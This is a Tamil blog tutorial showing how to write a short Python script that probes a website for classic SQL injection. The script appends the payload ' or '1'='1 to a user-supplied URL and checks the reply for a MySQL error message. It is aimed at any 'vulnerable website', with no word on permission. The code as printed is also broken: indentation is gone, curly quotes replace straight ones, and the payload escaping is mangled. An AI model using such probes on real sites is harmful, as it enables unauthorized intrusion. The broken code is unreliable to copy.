பாதிக்கப்பட்ட வலைதளம் குறித்த பைத்தானின் எளிய SQL Injection சரிபார்ப்பு குறிமுறைவரிகள்

இன்றுநாம் ஒரு பாதிக்கப்பட்ட வலைதளம் குறித்த நம்முடைய முதன்முதலான எளிய SQL Injection சரிபார்ப்பு குறிமுறைவரிகளை பைத்தான் கணினி மொழியில் எவ்வாறு எழுதுவது என காணவிருக்கின்றோம் இதற்காக நமக்கு பைத்தான்கணினிமொழி 3.4 பதிப்பு , நல்ல இணையஇணைப்பு, பாதிக்கப்பட்ட ஏதேனுமொரு வலைதளம் ஆகியவைமட்டும் தேவையாகும் முதலில் new .py எனும் கோப்பினை உருவாக்கிகொள்க அதில் முதலில்பின்வரும் மூன்று குறிமுறைவரிகளை உள்ளீடுசெய்திடுக

import sys
import urllib
import urllib.request
fullurl = input(“Please specify the full vulnerable url: “)
for carg in sys.argv:
if carg == “-w”:
argnum = sys.argv.index(carg)
argnum += 1
fullurl = sys.argv[argnum]
இதில் முதல்வரியானது இயக்கமுறைமை அல்லது அமைப்பு முறையை உள்ளே கொண்டுவருகின்றது இரண்டாவது urllib தொடர்பான நூலகங்களை உள்ளே கொண்டுவருகின்றது மூன்றாவது வரி urllib தொடர்பான தொடர்புடைய கோரிக்கையை உள்ளே கொண்டுவருகின்றது நான்காவது வரியானது பயனாளரின் உள்ளீட்டினை பெறுகின்றது

import sys
import urllib
import urllib.request
fullurl = input(“Please specify the full vulnerable url: “)
resp = urllib.request.urlopen(fullurl + “=1\’ or \’1\’ = \’1\””)
body = resp.read()
fullbody = body.decode(‘utf-8’)
if “You have an error in your SQL syntax” in fullbody:
print (“The website is classic SQL injection vulnerable!”)
else:
print (“The website is not classic SQL injection vulnerable!”)

மறுமொழியொன்றை இடுங்கள்

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  மாற்று )

Google photo

You are commenting using your Google account. Log Out /  மாற்று )

Twitter picture

You are commenting using your Twitter account. Log Out /  மாற்று )

Facebook photo

You are commenting using your Facebook account. Log Out /  மாற்று )

Connecting to %s

%d bloggers like this: